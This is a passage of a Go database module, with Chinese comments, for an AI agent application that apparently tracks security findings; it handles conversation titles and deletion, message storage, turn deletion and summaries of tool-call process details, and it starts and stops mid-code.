fmt.Errorf("查询对话标题失败: %w", err) + } + return title, nil +} + +// UpdateConversationTitle 更新对话标题 +func (db *DB) UpdateConversationTitle(id, title string) error { + // 注意:不更新 updated_at,因为重命名操作不应该改变对话的更新时间 + _, err := db.Exec( + "UPDATE conversations SET title = ? WHERE id = ?", + title, id, + ) + if err != nil { + return fmt.Errorf("更新对话标题失败: %w", err) + } + return nil +} + +// UpdateConversationTime 更新对话时间 +func (db *DB) UpdateConversationTime(id string) error { + _, err := db.Exec( + "UPDATE conversations SET updated_at = ? WHERE id = ?", + time.Now(), id, + ) + if err != nil { + return fmt.Errorf("更新对话时间失败: %w", err) + } + return nil +} + +// DeleteConversation 删除对话及其会话相关数据。 +// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除: +// - messages(消息) +// - process_details(过程详情) +// - attack_chain_nodes(攻击链节点) +// - attack_chain_edges(攻击链边) +// - conversation_group_mappings(分组映射) +// 漏洞记录会保留:vulnerabilities.conversation_id 使用 ON DELETE SET NULL,仅解除与会话的关联。 +// 注意:knowledge_retrieval_logs 在删除前会被显式清理。 +func (db *DB) DeleteConversation(id string) error { + // 删除对话前补全漏洞来源标签,便于在漏洞库中追溯已删除会话的发现。 + _, err := db.Exec(` + UPDATE vulnerabilities + SET conversation_tag = COALESCE(NULLIF(TRIM(conversation_tag), ''), (SELECT title FROM conversations WHERE id = ?)) + WHERE conversation_id = ? + `, id, id) + if err != nil { + db.logger.Warn("更新漏洞来源标签失败", zap.String("conversationId", id), zap.Error(err)) + } + + // 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除) + _, err = db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id) + if err != nil { + db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err)) + // 不返回错误,继续删除对话 + } + + projectID, _ := db.GetConversationProjectID(id) + + // 删除对话(外键CASCADE会自动删除其他相关数据) + _, err = db.Exec("DELETE FROM conversations WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除对话失败: %w", err) + } + db.removeConversationScopedDirs(id, projectID) + + db.logger.Info("对话已删除(漏洞记录已保留)", zap.String("conversationId", id)) + return nil +} + +func sanitizeConversationPathSegment(s string) string { + s = strings.TrimSpace(s) + if s == "" { + return "default" + } + s = strings.ReplaceAll(s, string(filepath.Separator), "-") + s = strings.ReplaceAll(s, "/", "-") + s = strings.ReplaceAll(s, "\\", "-") + s = strings.ReplaceAll(s, "..", "__") + if len(s) > 180 { + s = s[:180] + } + return s +} + +func (db *DB) removeConversationScopedDir(base, conversationID, label string) { + base = strings.TrimSpace(base) + if base == "" { + return + } + dir := filepath.Join(base, sanitizeConversationPathSegment(conversationID)) + if rmErr := os.RemoveAll(dir); rmErr != nil { + if db.logger != nil { + db.logger.Warn("删除会话目录失败", + zap.String("conversationId", conversationID), + zap.String("kind", label), + zap.String("dir", dir), + zap.Error(rmErr)) + } + } +} + +func (db *DB) einoReductionBaseDir() string { + if db == nil { + return "" + } + if base := strings.TrimSpace(db.einoReductionRootDir); base != "" { + return base + } + return filepath.Join("tmp", "reduction") +} + +// EinoReductionBaseDir returns the configured reduction cache root. +func (db *DB) EinoReductionBaseDir() string { + return db.einoReductionBaseDir() +} + +// ConversationArtifactsBaseDir returns the conversation-scoped artifacts root. +func (db *DB) ConversationArtifactsBaseDir() string { + if db == nil { + return "" + } + return strings.TrimSpace(db.conversationArtifactsDir) +} + +// EinoWorkspaceBaseDir returns the configured agent workspace root. +func (db *DB) EinoWorkspaceBaseDir() string { + return db.einoWorkspaceBaseDir() +} + +func (db *DB) einoWorkspaceBaseDir() string { + if db == nil { + return "" + } + if base := strings.TrimSpace(db.einoWorkspaceRootDir); base != "" { + return base + } + return filepath.Join("tmp", "workspace") +} + +func (db *DB) removeConversationScopedDirs(conversationID, projectID string) { + // summarization transcript, etc. + db.removeConversationScopedDir(db.conversationArtifactsDir, conversationID, "conversation_artifacts") + // Eino plantask JSON boards (skills_dir/.eino/plantask//). + db.removeConversationScopedDir(db.einoPlantaskBaseDir, conversationID, "plantask") + // Eino ADK runner checkpoints (checkpoint_dir//). + db.removeConversationScopedDir(db.einoCheckpointBaseDir, conversationID, "eino_checkpoint") + // Eino reduction persisted tool outputs (tmp/reduction/conversations//). + // Project-bound sessions share projects// — skip on single conversation delete. + if strings.TrimSpace(projectID) == "" { + reductionBase := filepath.Join(db.einoReductionBaseDir(), "conversations") + db.removeConversationScopedDir(reductionBase, conversationID, "reduction") + workspaceBase := filepath.Join(db.einoWorkspaceBaseDir(), "conversations") + db.removeConversationScopedDir(workspaceBase, conversationID, "workspace") + } +} + +func (db *DB) removeProjectScopedDirs(projectID string) { + // Eino reduction persisted tool outputs (tmp/reduction/projects//). + reductionBase := filepath.Join(db.einoReductionBaseDir(), "projects") + db.removeConversationScopedDir(reductionBase, projectID, "reduction") + // Agent download/analysis workspace (tmp/workspace/projects//). + workspaceBase := filepath.Join(db.einoWorkspaceBaseDir(), "projects") + db.removeConversationScopedDir(workspaceBase, projectID, "workspace") +} + +// SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。 +// SQLite 列名仍为 last_react_input / last_react_output,与历史库表兼容;语义上为「全模式代理轨迹」,非仅 ReAct。 +func (db *DB) SaveAgentTrace(conversationID, traceInputJSON, assistantOutput string) error { + _, err := db.Exec( + "UPDATE conversations SET last_react_input = ?, last_react_output = ?, updated_at = ? WHERE id = ?", + traceInputJSON, assistantOutput, time.Now(), conversationID, + ) + if err != nil { + return fmt.Errorf("保存代理轨迹失败: %w", err) + } + return nil +} + +// GetAgentTrace 读取 conversations 中保存的代理轨迹(列名 last_react_*)。 +func (db *DB) GetAgentTrace(conversationID string) (traceInputJSON, assistantOutput string, err error) { + var input, output sql.NullString + err = db.QueryRow( + "SELECT last_react_input, last_react_output FROM conversations WHERE id = ?", + conversationID, + ).Scan(&input, &output) + if err != nil { + if err == sql.ErrNoRows { + return "", "", fmt.Errorf("对话不存在") + } + return "", "", fmt.Errorf("获取代理轨迹失败: %w", err) + } + + if input.Valid { + traceInputJSON = input.String + } + if output.Valid { + assistantOutput = output.String + } + + return traceInputJSON, assistantOutput, nil +} + +// ConversationHasToolProcessDetails 对话是否存在已落库的工具调用/结果(用于多代理等场景下 MCP execution id 未汇总时的攻击链判定)。 +func (db *DB) ConversationHasToolProcessDetails(conversationID string) (bool, error) { + var n int + err := db.QueryRow( + `SELECT COUNT(*) FROM process_details WHERE conversation_id = ? AND event_type IN ('tool_call', 'tool_result')`, + conversationID, + ).Scan(&n) + if err != nil { + return false, fmt.Errorf("查询过程详情失败: %w", err) + } + return n > 0, nil +} + +// AddMessage 添加消息 +func (db *DB) AddMessage(conversationID, role, content string, mcpExecutionIDs []string) (*Message, error) { + id := uuid.New().String() + now := time.Now() + + var mcpIDsJSON string + if len(mcpExecutionIDs) > 0 { + jsonData, err := json.Marshal(mcpExecutionIDs) + if err != nil { + db.logger.Warn("序列化MCP执行ID失败", zap.Error(err)) + } else { + mcpIDsJSON = string(jsonData) + } + } + + _, err := db.Exec( + "INSERT INTO messages (id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?, ?)", + id, conversationID, role, content, "", mcpIDsJSON, now, now, + ) + if err != nil { + return nil, fmt.Errorf("添加消息失败: %w", err) + } + + // 更新对话时间 + if err := db.UpdateConversationTime(conversationID); err != nil { + db.logger.Warn("更新对话时间失败", zap.Error(err)) + } + + message := &Message{ + ID: id, + ConversationID: conversationID, + Role: role, + Content: content, + MCPExecutionIDs: mcpExecutionIDs, + CreatedAt: now, + UpdatedAt: now, + } + + return message, nil +} + +// UpdateAssistantMessageFinalize 更新助手消息终态(正文、MCP id、思考链聚合文本,供无轨迹回退时回放)。 +func (db *DB) UpdateAssistantMessageFinalize(messageID, content string, mcpExecutionIDs []string, reasoningContent string) error { + var mcpIDsJSON string + if len(mcpExecutionIDs) > 0 { + jsonData, err := json.Marshal(mcpExecutionIDs) + if err != nil { + return fmt.Errorf("序列化MCP执行ID失败: %w", err) + } + mcpIDsJSON = string(jsonData) + } + _, err := db.Exec( + "UPDATE messages SET content = ?, mcp_execution_ids = ?, reasoning_content = ?, updated_at = ? WHERE id = ?", + content, mcpIDsJSON, strings.TrimSpace(reasoningContent), time.Now(), messageID, + ) + if err != nil { + return fmt.Errorf("更新助手消息失败: %w", err) + } + return nil +} + +// GetMessages 获取对话的所有消息 +func (db *DB) GetMessages(conversationID string) ([]Message, error) { + rows, err := db.Query( + "SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC", + conversationID, + ) + if err != nil { + return nil, fmt.Errorf("查询消息失败: %w", err) + } + defer rows.Close() + + var messages []Message + for rows.Next() { + var msg Message + var reasoning sql.NullString + var mcpIDsJSON sql.NullString + var createdAt string + var updatedAt sql.NullString + + if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &reasoning, &mcpIDsJSON, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描消息失败: %w", err) + } + if reasoning.Valid { + msg.ReasoningContent = reasoning.String + } + + // 尝试多种时间格式解析 + var err error + msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err != nil { + msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err != nil { + msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + // updated_at 兼容老库:字段不存在/为空时回退为 created_at + if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" { + msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String) + if err != nil { + msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String) + } + if err != nil { + msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String) + } + } + if msg.UpdatedAt.IsZero() { + msg.UpdatedAt = msg.CreatedAt + } + + // 解析MCP执行ID + if mcpIDsJSON.Valid && mcpIDsJSON.String != "" { + if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil { + db.logger.Warn("解析MCP执行ID失败", zap.Error(err)) + } + } + + messages = append(messages, msg) + } + + return messages, nil +} + +// GetMessagesLite 获取对话消息(不含 reasoning_content),用于历史会话快速切换。 +func (db *DB) GetMessagesLite(conversationID string) ([]Message, error) { + rows, err := db.Query( + "SELECT id, conversation_id, role, content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC", + conversationID, + ) + if err != nil { + return nil, fmt.Errorf("查询消息失败: %w", err) + } + defer rows.Close() + + var messages []Message + for rows.Next() { + var msg Message + var mcpIDsJSON sql.NullString + var createdAt string + var updatedAt sql.NullString + + if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &mcpIDsJSON, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描消息失败: %w", err) + } + + var err error + msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err != nil { + msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err != nil { + msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" { + msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String) + if err != nil { + msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String) + } + if err != nil { + msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String) + } + } + if msg.UpdatedAt.IsZero() { + msg.UpdatedAt = msg.CreatedAt + } + + if mcpIDsJSON.Valid && mcpIDsJSON.String != "" { + if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil { + db.logger.Warn("解析MCP执行ID失败", zap.Error(err)) + } + } + + messages = append(messages, msg) + } + + return messages, nil +} + +// turnSliceRange 根据任意一条消息 ID 定位「一轮对话」在 msgs 中的 [start, end) 下标区间(msgs 须已按时间升序,与 GetMessages 一致)。 +// 一轮 = 从某条 user 消息起,至下一条 user 之前(含中间所有 assistant)。 +func turnSliceRange(msgs []Message, anchorID string) (start, end int, err error) { + idx := -1 + for i := range msgs { + if msgs[i].ID == anchorID { + idx = i + break + } + } + if idx < 0 { + return 0, 0, fmt.Errorf("message not found") + } + start = idx + for start > 0 && msgs[start].Role != "user" { + start-- + } + if start < len(msgs) && msgs[start].Role != "user" { + start = 0 + } + end = len(msgs) + for i := start + 1; i < len(msgs); i++ { + if msgs[i].Role == "user" { + end = i + break + } + } + return start, end, nil +} + +// DeleteConversationTurn 删除锚点所在轮次的全部消息(用户提问 + 该轮助手回复等),并清空 last_react_*,避免与消息表不一致。 +func (db *DB) DeleteConversationTurn(conversationID, anchorMessageID string) (deletedIDs []string, err error) { + msgs, err := db.GetMessages(conversationID) + if err != nil { + return nil, err + } + start, end, err := turnSliceRange(msgs, anchorMessageID) + if err != nil { + return nil, err + } + if start >= end { + return nil, fmt.Errorf("empty turn range") + } + deletedIDs = make([]string, 0, end-start) + for i := start; i < end; i++ { + deletedIDs = append(deletedIDs, msgs[i].ID) + } + + tx, err := db.Begin() + if err != nil { + return nil, fmt.Errorf("begin tx: %w", err) + } + defer func() { _ = tx.Rollback() }() + + ph := strings.Repeat("?,", len(deletedIDs)) + ph = ph[:len(ph)-1] + args := make([]interface{}, 0, 1+len(deletedIDs)) + args = append(args, conversationID) + for _, id := range deletedIDs { + args = append(args, id) + } + res, err := tx.Exec( + "DELETE FROM messages WHERE conversation_id = ? AND id IN ("+ph+")", + args..., + ) + if err != nil { + return nil, fmt.Errorf("delete messages: %w", err) + } + n, err := res.RowsAffected() + if err != nil { + return nil, err + } + if int(n) != len(deletedIDs) { + return nil, fmt.Errorf("deleted count mismatch") + } + + _, err = tx.Exec( + `UPDATE conversations SET last_react_input = NULL, last_react_output = NULL, updated_at = ? WHERE id = ?`, + time.Now(), conversationID, + ) + if err != nil { + return nil, fmt.Errorf("clear react data: %w", err) + } + + if err := tx.Commit(); err != nil { + return nil, fmt.Errorf("commit: %w", err) + } + + db.logger.Info("conversation turn deleted", + zap.String("conversationId", conversationID), + zap.Strings("deletedMessageIds", deletedIDs), + zap.Int("count", len(deletedIDs)), + ) + return deletedIDs, nil +} + +// ProcessDetail 过程详情事件 +type ProcessDetail struct { + ID string `json:"id"` + MessageID string `json:"messageId"` + ConversationID string `json:"conversationId"` + EventType string `json:"eventType"` // iteration, thinking, reasoning_chain, tool_calls_detected, tool_call, tool_result, progress, error + Message string `json:"message"` + Data string `json:"data"` // JSON格式的数据 + CreatedAt time.Time `json:"createdAt"` +} + +// GetTurnUserMessage 返回锚点消息所在轮次中的用户原文(最近一条 user 消息,不含完整历史)。 +func (db *DB) GetTurnUserMessage(conversationID, anchorMessageID string) (string, error) { + conversationID = strings.TrimSpace(conversationID) + anchorMessageID = strings.TrimSpace(anchorMessageID) + if conversationID == "" || anchorMessageID == "" { + return "", nil + } + var content string + err := db.QueryRow(` +SELECT m.content FROM messages m +WHERE m.conversation_id = ? AND m.role = 'user' + AND m.created_at <= COALESCE((SELECT created_at FROM messages WHERE id = ? AND conversation_id = ?), m.created_at) +ORDER BY m.created_at DESC, m.rowid DESC +LIMIT 1`, conversationID, anchorMessageID, conversationID).Scan(&content) + if err != nil { + if errors.Is(err, sql.ErrNoRows) { + return "", nil + } + return "", fmt.Errorf("query turn user message: %w", err) + } + return content, nil +} + +// AssistantCognitionTexts 单条助手消息上的思考/推理/规划文本。 +type AssistantCognitionTexts struct { + Thinking string + ReasoningChain string + Planning string +} + +// GetAssistantCognitionTexts 聚合助手消息在 process_details 中的 thinking / reasoning_chain / planning。 +func (db *DB) GetAssistantCognitionTexts(assistantMessageID string) (AssistantCognitionTexts, error) { + assistantMessageID = strings.TrimSpace(assistantMessageID) + if assistantMessageID == "" { + return AssistantCognitionTexts{}, nil + } + rows, err := db.Query(` +SELECT event_type, message FROM process_details +WHERE message_id = ? AND event_type IN ('thinking', 'reasoning_chain', 'planning') +ORDER BY created_at ASC, rowid ASC`, assistantMessageID) + if err != nil { + return AssistantCognitionTexts{}, fmt.Errorf("query assistant cognition: %w", err) + } + defer rows.Close() + + var thinkingParts, reasoningParts, planningParts []string + for rows.Next() { + var eventType, message string + if err := rows.Scan(&eventType, &message); err != nil { + continue + } + msg := strings.TrimSpace(message) + if msg == "" { + continue + } + switch eventType { + case "thinking": + thinkingParts = append(thinkingParts, msg) + case "reasoning_chain": + reasoningParts = append(reasoningParts, msg) + case "planning": + planningParts = append(planningParts, msg) + } + } + return AssistantCognitionTexts{ + Thinking: strings.Join(thinkingParts, "\n\n"), + ReasoningChain: strings.Join(reasoningParts, "\n\n"), + Planning: strings.Join(planningParts, "\n\n"), + }, nil +} + +// AddProcessDetail 添加过程详情事件 +func (db *DB) AddProcessDetail(messageID, conversationID, eventType, message string, data interface{}) error { + _, err := db.AddProcessDetailWithID(messageID, conversationID, eventType, message, data) + return err +} + +// AddProcessDetailWithID 添加过程详情事件并返回记录 ID。 +func (db *DB) AddProcessDetailWithID(messageID, conversationID, eventType, message string, data interface{}) (string, error) { + id := uuid.New().String() + + var dataJSON string + if data != nil { + jsonData, err := json.Marshal(data) + if err != nil { + db.logger.Warn("序列化过程详情数据失败", zap.Error(err)) + } else { + dataJSON = string(jsonData) + } + } + + _, err := db.Exec( + "INSERT INTO process_details (id, message_id, conversation_id, event_type, message, data, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, messageID, conversationID, eventType, message, dataJSON, time.Now(), + ) + if err != nil { + return "", fmt.Errorf("添加过程详情失败: %w", err) + } + + return id, nil +} + +// UpdateProcessDetailContent 更新流式聚合详情的正文与元数据。使用固定记录 ID, +// 避免每个 token 新增一行,同时让页面刷新能读取到尚未结束的规划输出。 +func (db *DB) UpdateProcessDetailContent(id, message string, data interface{}) error { + var dataJSON string + if data != nil { + jsonData, err := json.Marshal(data) + if err != nil { + return fmt.Errorf("序列化过程详情数据失败: %w", err) + } + dataJSON = string(jsonData) + } + result, err := db.Exec( + "UPDATE process_details SET message = ?, data = ? WHERE id = ?", + message, dataJSON, strings.TrimSpace(id), + ) + if err != nil { + return fmt.Errorf("更新过程详情失败: %w", err) + } + if affected, affectedErr := result.RowsAffected(); affectedErr == nil && affected == 0 { + return fmt.Errorf("过程详情不存在: %s", id) + } + return nil +} + +// DeleteProcessDetail 删除被判定为工具结果回显的临时规划记录。 +func (db *DB) DeleteProcessDetail(id string) error { + _, err := db.Exec("DELETE FROM process_details WHERE id = ?", strings.TrimSpace(id)) + if err != nil { + return fmt.Errorf("删除过程详情失败: %w", err) + } + return nil +} + +// GetProcessDetails 获取消息的过程详情 +func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) { + rows, err := db.Query( + "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC", + messageID, + ) + if err != nil { + return nil, fmt.Errorf("查询过程详情失败: %w", err) + } + defer rows.Close() + + var details []ProcessDetail + for rows.Next() { + var detail ProcessDetail + var createdAt string + + if err := rows.Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt); err != nil { + return nil, fmt.Errorf("扫描过程详情失败: %w", err) + } + + // 尝试多种时间格式解析 + var err error + detail.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if err != nil { + detail.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt) + } + if err != nil { + detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + + details = append(details, detail) + } + + return details, nil +} + +// GetProcessDetailByID 获取单条过程详情。 +func (db *DB) GetProcessDetailByID(id string) (*ProcessDetail, error) { + var detail ProcessDetail + var createdAt string + err := db.QueryRow( + "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE id = ?", + id, + ).Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt) + if err != nil { + return nil, fmt.Errorf("查询过程详情失败: %w", err) + } + + var parseErr error + detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if parseErr != nil { + detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05", createdAt) + } + if parseErr != nil { + detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt) + } + return &detail, nil +} + +// ProcessDetailsSummary 过程详情摘要(用于折叠态展示,避免全量加载)。 +type ProcessDetailsSummary struct { + Total int `json:"total"` + IterationCount int `json:"iterationCount"` + MaxIteration int `json:"maxIteration"` + ToolCount int `json:"toolCount"` + ToolExecutions []ProcessDetailsToolExecution `json:"toolExecutions,omitempty"` + MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"` + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + DurationMs int64 `json:"durationMs"` + Status string `json:"status,omitempty"` +} + +type ProcessDetailsToolExecution struct { + ProcessDetailID string `json:"processDetailId,omitempty"` + ResultDetailID string `json:"resultDetailId,omitempty"` + ToolName string `json:"toolName,omitempty"` + ToolCallID string `json:"toolCallId,omitempty"` + ExecutionID string `json:"executionId,omitempty"` + Status string `json:"status,omitempty"` +} + +// GetProcessDetailsSummary 统计消息的过程详情数量与迭代轮次。 +func (db *DB) GetProcessDetailsSummary(messageID string) (*ProcessDetailsSummary, error) { + var total int + if err := db.QueryRow( + "SELECT COUNT(*) FROM process_details WHERE message_id = ?", + messageID, + ).Scan(&total); err != nil { + return nil, fmt.Errorf("统计过程详情失败: %w", err) + } + + summary := &ProcessDetailsSummary{Total: total} + var messageCreatedAt, messageUpdatedAt sql.NullString + var messageContent string + if err := db.QueryRow( + "SELECT created_at, updated_at, content FROM messages WHERE id = ?", + messageID, + ).Scan(&messageCreatedAt, &messageUpdatedAt, &messageContent); err != nil && !errors.Is(err, sql.ErrNoRows) { + return nil, fmt.Errorf("查询过程详情耗时失败: %w", err) + } + if messageCreatedAt.Valid { + if startedAt := parseDBTime(messageCreatedAt.String); !startedAt.IsZero() { + summary.StartedAt = &startedAt + } + } + var terminalEvent, terminalCreatedAt string + terminalErr := db.QueryRow(` +SELECT event_type, created_at +FROM process_details +WHERE message_id = ? AND event_type IN ('cancelled', 'timeout', 'error') +ORDER BY created_at DESC, rowid DESC +LIMIT 1`, messageID).Scan(&terminalEvent, &terminalCreatedAt) + if terminalErr != nil && !errors.Is(terminalErr, sql.ErrNoRows) { + return nil, fmt.Errorf("查询过程详情终态失败: %w", terminalErr) + } + if terminalEvent != "" { + switch terminalEvent { + case "cancelled": + summary.Status = "cancelled" + case "timeout": + summary.Status = "timeout" + default: + summary.Status = "failed" + } + if completedAt := parseDBTime(terminalCreatedAt); !completedAt.IsZero() { + summary.CompletedAt = &completedAt + } + } else if strings.TrimSpace(messageContent) == "处理中..." || strings.TrimSpace(messageContent) == "Processing..." { + summary.Status = "running" + } else { + summary.Status = "completed" + if messageUpdatedAt.Valid { + if completedAt := parseDBTime(messageUpdatedAt.String); !completedAt.IsZero() { + summary.CompletedAt = &completedAt + } + } + } + if summary.StartedAt != nil && summary.CompletedAt != nil && !summary.CompletedAt.Before(*summary.StartedAt) { + summary.DurationMs = summary.CompletedAt.Sub(*summary.StartedAt).Milliseconds() + } + if total == 0 { + return summary, nil + } + + if err := db.QueryRow( + "SELECT COUNT(*) FROM process_details WHERE message_id = ? AND event_type = 'tool_call'", + messageID, + ).Scan(&summary.ToolCount); err != nil { + return nil, fmt.Errorf("统计工具调用详情失败: %w", err) + } + + execRows, err := db.Query( + "SELECT id, event_type, data FROM process_details WHERE message_id = ? AND event_type IN ('tool_call', 'tool_result') ORDER BY created_at ASC, rowid ASC", + messageID, + ) + if err != nil { + return nil, fmt.Errorf("查询工具执行摘要失败: %w", err) + } + seenExecIDs := make(map[string]bool) + // A provider may reuse a fallback toolCallId across streaming rounds. Keep a + // FIFO per ID instead of a single index so every persisted call gets at most + // one result. Results without a stable ID are kept separate instead of being + // guessed by order; showing no link is safer than linking to the wrong tool. + toolIndexesByCallID := make(map[string][]int) + lastMatchedToolIndexByCallID := make(map[string]int) + matchedToolIndexes := make([]bool, 0) + nextUnmatchedToolIdx := 0 + for execRows.Next() { + var detailID string + var eventType string + var dataJSON string + if err := execRows.Scan(&detailID, &eventType, &dataJSON); err != nil { + execRows.Close() + return nil, fmt.Errorf("扫描工具执行摘要失败: %w", err) + } + if dataJSON == "" { + continue + } + var payload map[string]interface{} + if err := json.Unmarshal([]byte(dataJSON), &payload); err != nil { + continue + } + toolName, _ := payload["toolName"].(string) + toolName = strings.TrimSpace(toolName) + toolCallID, _ := payload["toolCallId"].(string) + toolCallID = strings.TrimSpace(toolCallID) + execID, _ := payload["executionId"].(string) + execID = strings.TrimSpace(execID) + status := "" + if eventType == "tool_result" { + if success, ok := payload["success"].(bool); ok { + if success { + status = "completed" + } else { + status = "failed" + } + } else if isErr, ok := payload["isError"].(bool); ok && isErr { + status = "failed" + } + } + if eventType == "tool_call" { + summary.ToolExecutions = append(summary.ToolExecutions, ProcessDetailsToolExecution{ + ProcessDetailID: strings.TrimSpace(detailID), + ToolName: toolName, + ToolCallID: toolCallID, + // This summary is reconstructed from persisted history, not live + // execution state. Until a matching result is found the honest state + // is "result_missing", never "running". + Status: "result_missing", + }) + matchedToolIndexes = append(matchedToolIndexes, false) + if toolCallID != "" { + toolIndexesByCallID[toolCallID] = append(toolIndexesByCallID[toolCallID], len(summary.ToolExecutions)-1) + } + } + if eventType == "tool_result" { + idx := -1 + if toolCallID != "" { + queue := toolIndexesByCallID[toolCallID] + for len(queue) > 0 { + candidate := queue[0] + queue = queue[1:] + if candidate >= 0 && candidate < len(matchedToolIndexes) && !matchedToolIndexes[candidate] { + idx = candidate + break + } + } + toolIndexesByCallID[toolCallID] = queue + if idx < 0 { + // Multiple persisted result events for one call (for example an + // agent-facing reduced result replacing an earlier preview) update + // that call instead of consuming an unrelated FIFO entry. + if previous, ok := lastMatchedToolIndexByCallID[toolCallID]; ok { + idx = previous + } + } + } + if idx < 0 && toolCallID != "" { + for nextUnmatchedToolIdx < len(matchedToolIndexes) && matchedToolIndexes[nextUnmatchedToolIdx] { + nextUnmatchedToolIdx++ + } + if nextUnmatchedToolIdx < len(matchedToolIndexes) { + idx = nextUnmatchedToolIdx + nextUnmatchedToolIdx++ + } + } + if idx >= 0 && idx < len(summary.ToolExecutions) { + matchedToolIndexes[idx] = true + if toolCallID != "" { + lastMatchedToolIndexByCallID[toolCallID] = idx + } + summary.ToolExecutions[idx].ResultDetailID = strings.TrimSpace(detailID) + if summary.ToolExecutions[idx].ToolName == "" { + summary.ToolExecutions[idx].ToolName = toolName + } + if summary.ToolExecutions[idx].ToolCallID == "" { + summary.ToolExecutions[idx].ToolCallID = toolCallID + } + summary.ToolExecutions[idx].ExecutionID = execID + if status != "" { + summary.ToolExecutions[idx].Status = status + } + } else { + summary.ToolExecutions = append(summary.ToolExecutions, ProcessDetailsToolExecution{ + ProcessDetailID: strings.TrimSpace(detailID), + ToolName: toolName, + ToolCallID: toolCallID, + ExecutionID: execID, + Status: status, + }) + matchedToolIndexes = append(matchedToolIndexes, true) + } + } + if execID != "" && !seenExecIDs[execID] { + seenExecIDs[execID] = true + summary.MCPExecutionIDs = append(summary.MCPExecutionIDs, execID) + } + } + if err := execRows.Err(); err != nil { + execRows.Close() + return nil, fmt.Errorf("遍历工具执行摘要失败: %w", err) + } + execRows.Close() + + rows, err := db.Query( + "SELECT data FROM process_details WHERE message_id = ? AND event_type = 'iteration' ORDER BY created_at ASC, rowid ASC", + messageID, + ) + if err != nil { + return nil, fmt.Errorf("查询迭代详情失败: %w", err) + } + defer rows.Close() + + maxIter := 0 + iterCount := 0 + for rows.Next() { + var dataJSON string + if err := rows.Scan(&dataJSON); err != nil { + return nil, fmt.Errorf("扫描迭代详情失败: %w", err) + } + iterCount++ + if dataJSON == "" { + continue + } + var payload map[string]interface{} + if err := json.Unmarshal([]byte(dataJSON), &payload); err != nil { + continue + } + if n, ok := payload["iteration"].(float64); ok && int(n) > maxIter { + maxIter = int(n) + } + } + summary.IterationCount = iterCount + summary.MaxIteration = maxIter + return summary, nil +} + +// GetProcessDetailsPage 分页获取消息的过程详情(按时间升序)。 +func (db *DB) GetProcessDetailsPage(messageID string, limit, offset int) ([]ProcessDetail, int, error) { + var total int + if err := db.QueryRow( + "SELECT COUNT(*) FROM process_details WHERE message_id = ?", + messageID, + ).Scan(&total); err != nil { + return nil, 0, fmt.Errorf("统计过程详情失败: %w", err) + } + if total == 0 || offset >= total { + return nil, total, nil + } + + rows, err := db.Query( + "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC LIMIT ? OFFSET ?", + messageID, limit, offset, + ) + if err != nil { + return nil, 0, fmt.Errorf("查询过程详情失败: %w", err) + } + defer rows.Close() + + var details []ProcessDetail + for rows.Next() { + var detail ProcessDetail + var createdAt string + + if err := rows.Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt); err != nil { + return nil, 0, fmt.Errorf("扫描过程详情失败: %w", err) + } + + var parseErr error + detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt) + if parseErr != nil { + detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05", createdAt) + } + if parseErr 